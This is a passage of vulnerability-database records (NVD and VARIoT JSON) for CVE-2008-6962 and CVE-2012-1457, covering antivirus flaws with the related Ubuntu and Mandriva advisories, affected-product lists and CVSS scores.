                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_professional:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "E36F359D-D095-45BB-9154-707F3889B44F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_security_suite:-:-:premium:*:*:*:*:*",
                     matchCriteriaId: "F805305F-CFA4-4BC9-8C89-885D85B4B8E5",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Avira AntiVir Premium, Premium Security Suite, AntiVir Professional, and AntiVir Personal - FREE allows local users to execute arbitrary code via a crafted IOCTL request that overwrites a kernel pointer.",
      },
      {
         lang: "es",
         value: "Avira AntiVir Premium, Premium Security Suite, AntiVir Professional, y AntiVir Personal - FREE permite a los usuarios locales ejecutar arbitrariamente código a través de peticiones IOCTL manipuladas que sobreescriben un puntero al núcleo.",
      },
   ],
   id: "CVE-2008-6962",
   lastModified: "2024-11-21T00:57:55.190",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "LOCAL",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 7.2,
               confidentialityImpact: "COMPLETE",
               integrityImpact: "COMPLETE",
               vectorString: "AV:L/AC:L/Au:N/C:C/I:C/A:C",
               version: "2.0",
            },
            exploitabilityScore: 3.9,
            impactScore: 10,
            obtainAllPrivilege: true,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2009-08-13T16:30:00.953",
   references: [
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/bid/32269",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.vupen.com/english/VUPEN-Security-Advisory-20081112.txt",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.vupen.com/english/advisories/2008/3130",
      },
      {
         source: "cve@mitre.org",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46567",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/bid/32269",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.vupen.com/english/VUPEN-Security-Advisory-20081112.txt",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.vupen.com/english/advisories/2008/3130",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46567",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-20",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

var-201203-0381
Vulnerability from variot

The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. Multiple products TAR A file parser contains a vulnerability that can prevent malware detection. Different TAR If it is announced that there is also a problem with the parser implementation, this vulnerability can be CVE May be split.By a third party TAR Total file size exceeded length With field TAR Malware detection can be bypassed via archive entries. Successful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. Vulnerabilities exist in the TAR file parser in version 1004, Trend Micro HouseCall version 9.120.0.1004, VBA32 version 3.12.14.2, and VirusBuster version 13.6.151.0. ============================================================================ Ubuntu Security Notice USN-1482-1 June 19, 2012

clamav vulnerabilities

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 12.04 LTS
  • Ubuntu 11.10
  • Ubuntu 11.04
  • Ubuntu 10.04 LTS

Summary:

ClamAV could improperly detect malware if it opened a specially crafted file.

Software Description: - clamav: Anti-virus utility for Unix

Details:

It was discovered that ClamAV incorrectly handled certain malformed TAR archives. (CVE-2012-1457, CVE-2012-1459)

It was discovered that ClamAV incorrectly handled certain malformed CHM files. (CVE-2012-1458)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 12.04 LTS: clamav 0.97.5+dfsg-1ubuntu0.12.04.1 clamav-daemon 0.97.5+dfsg-1ubuntu0.12.04.1 libclamav6 0.97.5+dfsg-1ubuntu0.12.04.1

Ubuntu 11.10: clamav 0.97.5+dfsg-1ubuntu0.11.10.1 clamav-daemon 0.97.5+dfsg-1ubuntu0.11.10.1 libclamav6 0.97.5+dfsg-1ubuntu0.11.10.1

Ubuntu 11.04: clamav 0.97.5+dfsg-1ubuntu0.11.04.1 clamav-daemon 0.97.5+dfsg-1ubuntu0.11.04.1 libclamav6 0.97.5+dfsg-1ubuntu0.11.04.1

Ubuntu 10.04 LTS: clamav 0.96.5+dfsg-1ubuntu1.10.04.4 clamav-daemon 0.96.5+dfsg-1ubuntu1.10.04.4 libclamav6 0.96.5+dfsg-1ubuntu1.10.04.4

In general, a standard system update will make all the necessary changes.

References: http://www.ubuntu.com/usn/usn-1482-1 CVE-2012-1457, CVE-2012-1458, CVE-2012-1459

Package Information: https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.1 https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.1 https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.1 https://launchpad.net/ubuntu/+source/clamav/0.96.5+dfsg-1ubuntu1.10.04.4 .

The Microsoft CHM file parser in ClamAV 0.96.4 allows remote attackers to bypass malware detection via a crafted reset interval in the LZXC header of a CHM file.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1457 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1458 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1459 http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=ChangeLog;hb=clamav-0.97.5

Updated Packages:

Mandriva Enterprise Server 5: d82d78601290e2f6073974170c81841a mes5/i586/clamav-0.97.5-0.1mdvmes5.2.i586.rpm 80f0475472c0217afd3727019bf27e53 mes5/i586/clamav-db-0.97.5-0.1mdvmes5.2.i586.rpm c13835eadea8d2af15b628fba3159e8b mes5/i586/clamav-milter-0.97.5-0.1mdvmes5.2.i586.rpm d7c058fae32f1a081b1d4ca31157df0e mes5/i586/clamd-0.97.5-0.1mdvmes5.2.i586.rpm 5ad153709c7eb510c2be2e82bfa5ac52 mes5/i586/libclamav6-0.97.5-0.1mdvmes5.2.i586.rpm 96e3d3f3e9bea802c4109c155c9d1465 mes5/i586/libclamav-devel-0.97.5-0.1mdvmes5.2.i586.rpm 203cde43731b63729d1f7f6497033184 mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm

Mandriva Enterprise Server 5/X86_64: b30f5aafd9aaff0a7743fb62f33ccbea mes5/x86_64/clamav-0.97.5-0.1mdvmes5.2.x86_64.rpm 1508801239427c0ac72734f52cb4451c mes5/x86_64/clamav-db-0.97.5-0.1mdvmes5.2.x86_64.rpm 92b4c5ca6db656801b5b6ae217c6e171 mes5/x86_64/clamav-milter-0.97.5-0.1mdvmes5.2.x86_64.rpm 94fad12df2cc900309087bbda13c826a mes5/x86_64/clamd-0.97.5-0.1mdvmes5.2.x86_64.rpm 8ec166a457d0512479adaaf5f80d487f mes5/x86_64/lib64clamav6-0.97.5-0.1mdvmes5.2.x86_64.rpm 19bc2758175bcde28ebf7783d68a9b98 mes5/x86_64/lib64clamav-devel-0.97.5-0.1mdvmes5.2.x86_64.rpm 203cde43731b63729d1f7f6497033184 mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm

To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:

gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com

Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.11 (GNU/Linux)

iD8DBQFP3tnKmqjQ0CJFipgRAj4wAJ9eURS1mZYCZhkmUTVE/U8QAH47MwCgxQzf OUr1QL5Wsvt3KboLKCdYUhE= =1QL7 -----END PGP SIGNATURE-----

Show details on source website


{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-201203-0381",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "virusbuster",
            scope: "eq",
            trust: 2.4,
            vendor: "virusbuster",
            version: "13.6.151.0",
         },
         {
            model: "avl sdk",
            scope: "eq",
            trust: 1.8,
            vendor: "antiy",
            version: "2.0.3.7",
         },
         {
            model: "command antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "authentium",
            version: "5.2.11.5",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "avg",
            version: "10.0.0.1190",
         },
         {
            model: "bitdefender",
            scope: "eq",
            trust: 1.8,
            vendor: "bitdefender",
            version: "7.2",
         },
         {
            model: "clamav",
            scope: "eq",
            trust: 1.8,
            vendor: "clamav",
            version: "0.96.4",
         },
         {
            model: "anti-malware",
            scope: "eq",
            trust: 1.8,
            vendor: "emsisoft",
            version: "5.1.0.1",
         },
         {
            model: "virus utilities t3 command line scanner",
            scope: "eq",
            trust: 1.8,
            vendor: "ikarus",
            version: "1.1.97.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "jiangmin",
            version: "13.0.900",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1.8,
            vendor: "pc tools",
            version: "7.0.3.5",
         },
         {
            model: "esafe",
            scope: "eq",
            trust: 1.8,
            vendor: "aladdin",
            version: "7.0.17.0",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 1.8,
            vendor: "kaspersky",
            version: "7.0.0.125",
         },
         {
            model: "security essentials",
            scope: "eq",
            trust: 1.8,
            vendor: "microsoft",
            version: "2.0",
         },
         {
            model: "scan engine",
            scope: "eq",
            trust: 1.8,
            vendor: "mcafee",
            version: "5.400.0.1158",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "rising global",
            version: "22.83.00.03",
         },
         {
            model: "avast antivirus",
            scope: "eq",
            trust: 1,
            vendor: "alwil",
            version: "5.0.677.0",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 1,
            vendor: "trendmicro",
            version: "9.120.0.1004",
         },
         {
            model: "nod32 antivirus",
            scope: "eq",
            trust: 1,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "g data antivirus",
            scope: "eq",
            trust: 1,
            vendor: "gdata",
            version: "21",
         },
         {
            model: "trend micro antivirus",
            scope: "eq",
            trust: 1,
            vendor: "trendmicro",
            version: "9.120.0.1004",
         },
         {
            model: "f-prot antivirus",
            scope: "eq",
            trust: 1,
            vendor: "f prot",
            version: "4.6.2.117",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 1,
            vendor: "k7computing",
            version: "9.77.3565",
         },
         {
            model: "quick heal",
            scope: "eq",
            trust: 1,
            vendor: "cat",
            version: "11.00",
         },
         {
            model: "vba32",
            scope: "eq",
            trust: 1,
            vendor: "anti virus",
            version: "3.12.14.2",
         },
         {
            model: "gateway",
            scope: "eq",
            trust: 1,
            vendor: "mcafee",
            version: "2010.1c",
         },
         {
            model: "antivir",
            scope: "eq",
            trust: 1,
            vendor: "avira",
            version: "7.11.1.163",
         },
         {
            model: "avast antivirus",
            scope: "eq",
            trust: 1,
            vendor: "alwil",
            version: "4.8.1351.0",
         },
         {
            model: "endpoint protection",
            scope: "eq",
            trust: 1,
            vendor: "symantec",
            version: "11.0",
         },
         {
            model: "antivirus \\& antispyware",
            scope: "eq",
            trust: 1,
            vendor: "norman",
            version: "6.06.12",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "avast s r o",
            version: "4.8.1351.0",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "avast s r o",
            version: "5.0.677.0",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "avira",
            version: "7.11.1.163",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "rising",
            version: "22.83.00.03",
         },
         {
            model: "nod32 anti-virus",
            scope: "eq",
            trust: 0.8,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "f-prot antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "frisk",
            version: "4.6.2.117",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "g data",
            version: "21",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "k7 computing",
            version: "9.77.3565",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "norman",
            version: "6.06.12",
         },
         {
            model: "vba32",
            scope: "eq",
            trust: 0.8,
            vendor: "virusblokada",
            version: "3.12.14.2",
         },
         {
            model: "heal",
            scope: "eq",
            trust: 0.8,
            vendor: "quick heal k k",
            version: "11.00",
         },
         {
            model: "endpoint protection",
            scope: "eq",
            trust: 0.8,
            vendor: "symantec",
            version: "11",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.8,
            vendor: "trend micro",
            version: "9.120.0.1004",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 0.8,
            vendor: "trend micro",
            version: "9.120.0.1004",
         },
         {
            model: "web gateway software",
            scope: "eq",
            trust: 0.8,
            vendor: "mcafee",
            version: "2010.1c",
         },
         {
            model: "vba32",
            scope: "eq",
            trust: 0.3,
            vendor: "virusblokada",
            version: "3.12.142",
         },
         {
            model: "linux lts i386",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "12.04",
         },
         {
            model: "linux lts amd64",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "12.04",
         },
         {
            model: "linux i386",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.10",
         },
         {
            model: "linux amd64",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.10",
         },
         {
            model: "linux powerpc",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.04",
         },
         {
            model: "linux i386",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.04",
         },
         {
            model: "linux arm",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.04",
         },
         {
            model: "linux amd64",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "11.04",
         },
         {
            model: "linux sparc",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "linux powerpc",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "linux i386",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "linux arm",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "linux amd64",
            scope: "eq",
            trust: 0.3,
            vendor: "ubuntu",
            version: "10.04",
         },
         {
            model: "virusbuster",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "13.6.1510",
         },
         {
            model: "trend micro",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "9.1201004",
         },
         {
            model: "housecall",
            scope: "eq",
            trust: 0.3,
            vendor: "trend micro",
            version: "9.1201004",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "symantec",
            version: "20101.3103",
         },
         {
            model: "opensuse",
            scope: "eq",
            trust: 0.3,
            vendor: "suse",
            version: "12.1",
         },
         {
            model: "opensuse",
            scope: "eq",
            trust: 0.3,
            vendor: "suse",
            version: "11.4",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "rising",
            version: "22.8303",
         },
         {
            model: "cat-quickheal",
            scope: "eq",
            trust: 0.3,
            vendor: "quick heal",
            version: "11.00",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "pctools",
            version: "7.0.35",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "norman",
            version: "6.6.12",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "microsoft",
            version: "1.6402",
         },
         {
            model: "mcafee-gw-edition 2010.1c",
            scope: null,
            trust: 0.3,
            vendor: "mcafee",
            version: null,
         },
         {
            model: "enterprise server x86 64",
            scope: "eq",
            trust: 0.3,
            vendor: "mandrakesoft",
            version: "5",
         },
         {
            model: "enterprise server",
            scope: "eq",
            trust: 0.3,
            vendor: "mandrakesoft",
            version: "5",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "kaspersky",
            version: "7.0125",
         },
         {
            model: "computing pvt ltd k7antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "k7",
            version: "9.77.3565",
         },
         {
            model: "jiangmin",
            scope: "eq",
            trust: 0.3,
            vendor: "jiangmin",
            version: "13.0.900",
         },
         {
            model: "antivirus t3.1.1.97.0",
            scope: null,
            trust: 0.3,
            vendor: "ikarus",
            version: null,
         },
         {
            model: "data software gdata",
            scope: "eq",
            trust: 0.3,
            vendor: "g",
            version: "21",
         },
         {
            model: "software f-prot antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "frisk",
            version: "4.6.2117",
         },
         {
            model: "nod32",
            scope: "eq",
            trust: 0.3,
            vendor: "eset",
            version: "5795",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "esafe",
            version: "7.0.170",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "emsisoft",
            version: "5.11",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "bitdefender",
            version: "7.2",
         },
         {
            model: "antivir engine",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "7.11.1163",
         },
         {
            model: "anti-virus",
            scope: "eq",
            trust: 0.3,
            vendor: "avg",
            version: "10.01190",
         },
         {
            model: "avast5 antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "5.0.6770",
         },
         {
            model: "antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.8.1351.0",
         },
         {
            model: "command antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "authentium",
            version: "5.2.115",
         },
         {
            model: "antiy-avl",
            scope: "eq",
            trust: 0.3,
            vendor: "antiy",
            version: "2.0.37",
         },
      ],
      sources: [
         {
            db: "BID",
            id: "52610",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
         {
            db: "NVD",
            id: "CVE-2012-1457",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-420",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [],
                  cpe_match: [
                     {
                        cpe23Uri: "cpe:2.3:a:bitdefender:bitdefender:7.2:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:cat:quick_heal:11.00:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:ikarus:ikarus_virus_utilities_t3_command_line_scanner:1.1.97.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:jiangmin:jiangmin_antivirus:13.0.900:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:pc_tools:pc_tools_antivirus:7.0.3.5:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:rising-global:rising_antivirus:22.83.00.03:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avira:antivir:7.11.1.163:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:clamav:clamav:0.96.4:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:authentium:command_antivirus:5.2.11.5:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:k7computing:antivirus:9.77.3565:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:kaspersky:kaspersky_anti-virus:7.0.0.125:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:symantec:endpoint_protection:11.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:trendmicro:trend_micro_antivirus:9.120.0.1004:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:alwil:avast_antivirus:5.0.677.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:avg:avg_anti-virus:10.0.0.1190:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:f-prot:f-prot_antivirus:4.6.2.117:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:gdata-software:g_data_antivirus:21:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:microsoft:security_essentials:2.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:eset:nod32_antivirus:5795:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:norman:norman_antivirus_\\&_antispyware:6.06.12:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:virusbuster:virusbuster:13.6.151.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:antiy:avl_sdk:2.0.3.7:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:alwil:avast_antivirus:4.8.1351.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:emsisoft:anti-malware:5.1.0.1:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:aladdin:esafe:7.0.17.0:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:mcafee:scan_engine:5.400.0.1158:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:mcafee:gateway:2010.1c:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:trendmicro:housecall:9.120.0.1004:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                     {
                        cpe23Uri: "cpe:2.3:a:anti-virus:vba32:3.12.14.2:*:*:*:*:*:*:*",
                        cpe_name: [],
                        vulnerable: true,
                     },
                  ],
                  operator: "OR",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2012-1457",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Suman Jana and Vitaly Shmatikov",
      sources: [
         {
            db: "BID",
            id: "52610",
         },
      ],
      trust: 0.3,
   },
   cve: "CVE-2012-1457",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "NONE",
                  baseScore: 4.3,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 8.6,
                  impactScore: 2.9,
                  integrityImpact: "PARTIAL",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Medium",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "None",
                  baseScore: 4.3,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2012-1457",
                  impactScore: null,
                  integrityImpact: "Partial",
                  obtainAllPrivilege: null,
